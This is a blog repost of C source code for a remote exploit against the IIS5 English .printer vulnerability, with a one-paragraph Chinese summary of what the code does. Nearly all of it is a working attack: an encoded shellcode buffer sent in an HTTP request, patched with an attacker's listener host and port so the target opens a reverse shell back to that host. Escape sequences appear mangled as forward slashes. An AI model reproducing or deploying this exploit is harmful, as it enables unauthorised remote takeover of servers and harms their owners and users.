Source Code of IIS5 .Printer Exploit

最新推荐文章于 2019-05-31 19:47:41 发布

转载最新推荐文章于 2019-05-31 19:47:41 发布 · 714 阅读

标签

#iis #struct #include #stream #socket

此博客展示了一段针对IIS5英文版本.Printer的漏洞利用代码。代码包含头文件引入、漏洞利用数据定义，通过命令行接收参数，进行主机解析、端口和地址处理，利用socket建立连接并发送shell代码，以实现对目标服务器的攻击。

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <winsock2.h>

int main(int argc, char *argv[])
{
--WSADATA wsaData;
--WSAStartup(MAKEWORD(2, 2), &wsaData);
--
--unsigned char sploit[] =
----"/x47/x45/x54/x20/x2f/x4e/x55/x4c/x4c/x2e/x70/x72/x69/x6e/x74/x65/x72/x20"
----"/x48/x54/x54/x50/x2f/x31/x2e/x30/x0d/x0a/x42/x65/x61/x76/x75/x68/x3a/x20"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/xeb/x03/x5d/xeb/x05/xe8/xf8/xff/xff/xff/x83/xc5/x15/x90/x90/x90"
----"/x8b/xc5/x33/xc9/x66/xb9/xd7/x02/x50/x80/x30/x95/x40/xe2/xfa/x2d/x95/x95"
----"/x64/xe2/x14/xad/xd8/xcf/x05/x95/xe1/x96/xdd/x7e/x60/x7d/x95/x95/x95/x95"
----"/xc8/x1e/x40/x14/x7f/x9a/x6b/x6a/x6a/x1e/x4d/x1e/xe6/xa9/x96/x66/x1e/xe3"
----"/xed/x96/x66/x1e/xeb/xb5/x96/x6e/x1e/xdb/x81/xa6/x78/xc3/xc2/xc4/x1e/xaa"
----"/x96/x6e/x1e/x67/x2c/x9b/x95/x95/x95/x66/x33/xe1/x9d/xcc/xca/x16/x52/x91"
----"/xd0/x77/x72/xcc/xca/xcb/x1e/x58/x1e/xd3/xb1/x96/x56/x44/x74/x96/x54/xa6"
----"/x5c/xf3/x1e/x9d/x1e/xd3/x89/x96/x56/x54/x74/x97/x96/x54/x1e/x95/x96/x56"
----"/x1e/x67/x1e/x6b/x1e/x45/x2c/x9e/x95/x95/x95/x7d/xe1/x94/x95/x95/xa6/x55"
----"/x39/x10/x55/xe0/x6c/xc7/xc3/x6a/xc2/x41/xcf/x1e/x4d/x2c/x93/x95/x95/x95"
----"/x7d/xce/x94/x95/x95/x52/xd2/xf1/x99/x95/x95/x95/x52/xd2/xfd/x95/x95/x95"
----"/x95/x52/xd2/xf9/x94/x95/x95/x95/xff/x95/x18/xd2/xf1/xc5/x18/xd2/x85/xc5"
----"/x18/xd2/x81/xc5/x6a/xc2/x55/xff/x95/x18/xd2/xf1/xc5/x18/xd2/x8d/xc5/x18"
----"/xd2/x89/xc5/x6a/xc2/x55/x52/xd2/xb5/xd1/x95/x95/x95/x18/xd2/xb5/xc5/x6a"
----"/xc2/x51/x1e/xd2/x85/x1c/xd2/xc9/x1c/xd2/xf5/x1e/xd2/x89/x1c/xd2/xcd/x14"
----"/xda/xd9/x94/x94/x95/x95/xf3/x52/xd2/xc5/x95/x95/x18/xd2/xe5/xc5/x18/xd2"
----"/xb5/xc5/xa6/x55/xc5/xc5/xc5/xff/x94/xc5/xc5/x7d/x95/x95/x95/x95/xc8/x14"
----"/x78/xd5/x6b/x6a/x6a/xc0/xc5/x6a/xc2/x5d/x6a/xe2/x85/x6a/xc2/x71/x6a/xe2"
----"/x89/x6a/xc2/x71/xfd/x95/x91/x95/x95/xff/xd5/x6a/xc2/x45/x1e/x7d/xc5/xfd"
----"/x94/x94/x95/x95/x6a/xc2/x7d/x10/x55/x9a/x10/x3f/x95/x95/x95/xa6/x55/xc5"
----"/xd5/xc5/xd5/xc5/x6a/xc2/x79/x16/x6d/x6a/x9a/x11/x02/x95/x95/x95/x1e/x4d"
----"/xf3/x52/x92/x97/x95/xf3/x52/xd2/x97/x8e/xac/x52/xd2/x91/x5e/x38/x4c/xb3"
----"/xff/x85/x18/x92/xc5/xc6/x6a/xc2/x61/xff/xa7/x6a/xc2/x49/xa6/x5c/xc4/xc3"
----"/xc4/xc4/xc4/x6a/xe2/x81/x6a/xc2/x59/x10/x55/xe1/xf5/x05/x05/x05/x05/x15"
----"/xab/x95/xe1/xba/x05/x05/x05/x05/xff/x95/xc3/xfd/x95/x91/x95/x95/xc0/x6a"
----"/xe2/x81/x6a/xc2/x4d/x10/x55/xe1/xd5/x05/x05/x05/x05/xff/x95/x6a/xa3/xc0"
----"/xc6/x6a/xc2/x6d/x16/x6d/x6a/xe1/xbb/x05/x05/x05/x05/x7e/x27/xff/x95/xfd"
----"/x95/x91/x95/x95/xc0/xc6/x6a/xc2/x69/x10/x55/xe9/x8d/x05/x05/x05/x05/xe1"
----"/x09/xff/x95/xc3/xc5/xc0/x6a/xe2/x8d/x6a/xc2/x41/xff/xa7/x6a/xc2/x49/x7e"
----"/x1f/xc6/x6a/xc2/x65/xff/x95/x6a/xc2/x75/xa6/x55/x39/x10/x55/xe0/x6c/xc4"
----"/xc7/xc3/xc6/x6a/x47/xcf/xcc/x3e/x77/x7b/x56/xd2/xf0/xe1/xc5/xe7/xfa/xf6"
----"/xd4/xf1/xf1/xe7/xf0/xe6/xe6/x95/xd9/xfa/xf4/xf1/xd9/xfc/xf7/xe7/xf4/xe7"
----"/xec/xd4/x95/xd6/xe7/xf0/xf4/xe1/xf0/xc5/xfc/xe5/xf0/x95/xd2/xf0/xe1/xc6"
----"/xe1/xf4/xe7/xe1/xe0/xe5/xdc/xfb/xf3/xfa/xd4/x95/xd6/xe7/xf0/xf4/xe1/xf0"
----"/xc5/xe7/xfa/xf6/xf0/xe6/xe6/xd4/x95/xc5/xf0/xf0/xfe/xdb/xf4/xf8/xf0/xf1"
----"/xc5/xfc/xe5/xf0/x95/xd2/xf9/xfa/xf7/xf4/xf9/xd4/xf9/xf9/xfa/xf6/x95/xc2"
----"/xe7/xfc/xe1/xf0/xd3/xfc/xf9/xf0/x95/xc7/xf0/xf4/xf1/xd3/xfc/xf9/xf0/x95"
----"/xc6/xf9/xf0/xf0/xe5/x95/xd0/xed/xfc/xe1/xc5/xe7/xfa/xf6/xf0/xe6/xe6/x95"
----"/xd6/xf9/xfa/xe6/xf0/xdd/xf4/xfb/xf1/xf9/xf0/x95/xc2/xc6/xda/xd6/xde/xa6"
----"/xa7/x95/xc2/xc6/xd4/xc6/xe1/xf4/xe7/xe1/xe0/xe5/x95/xe6/xfa/xf6/xfe/xf0"
----"/xe1/x95/xf6/xf9/xfa/xe6/xf0/xe6/xfa/xf6/xfe/xf0/xe1/x95/xf6/xfa/xfb/xfb"
----"/xf0/xf6/xe1/x95/xe6/xf0/xfb/xf1/x95/xe7/xf0/xf6/xe3/x95/xf6/xf8/xf1/xbb"
----"/xf0/xed/xf0/x95/x0d/x0a/x48/x6f/x73/x74/x3a/x20/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
----"/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x33"
----"/xc0/xb0/x90/x03/xd8/x8b/x03/x8b/x40/x60/x33/xdb/xb3/x24/x03/xc3/xff/xe0"
----"/xeb/xb9/x90/x90/x05/x31/x8c/x6a/x0d/x0a/x0d/x0a";
--
--int s;
--unsigned short int a_port;
--unsigned long a_host;
--struct hostent *ht;
--struct sockaddr_in sin;
--
--printf("/n===========IIS5 English Version .Printer Exploit.===========/n"
---- "===Written by Assassin 1995-2001. http://www.netXeyes.com===/n/n ");
--
--if (argc != 4)
--{
----printf("Usage: %s <IIS Server> <NC Host> <NC Listen Port>/n", argv[0]);
exit(1);
--}
--
--if ((ht = gethostbyname(argv[1])) == 0)
--{
----printf("Host Resolv Failed./n");
----exit(1);
--}
--
--sin.sin_port = htons(80);
--a_port = htons(atoi(argv[3]));
--a_port^=0x9595;
--
--sin.sin_family = AF_INET;
--sin.sin_addr = * ((struct in_addr *)ht->h_addr);
--
--if ((ht = gethostbyname(argv[2])) == 0)
--{
----printf("Host Resolv Failed./n");
----exit(1);
--}
--
--a_host = * ((unsigned long *)ht->h_addr);
--a_host^=0x95959595;
--
--sploit[441] = (a_port) & 0xff;
--sploit[442] = (a_port >> 8) & 0xff;
--
--sploit[446] = (a_host) & 0xff;
--sploit[447] = (a_host >> 8) & 0xff;
--sploit[448] = (a_host >> 16) & 0xff;
--sploit[449] = (a_host >> 24) & 0xff;
--
--if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1)
--{
----exit(1);
--}
--
--
--if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1)
--{
----printf("/nConnecting %s ...Failed./n", argv[1]);
----exit(1);
--}
--
--printf("/nConnecting %s ...OK./n", argv[1]);
--printf("Send Shell Code ...");
--if(send(s, (char*)sploit, 1182, 0) == 1182)
--{
----printf("OK/n");
--}
--else
----printf("Error/n");
--Sleep(1);
--closesocket(s);
--WSACleanup();

}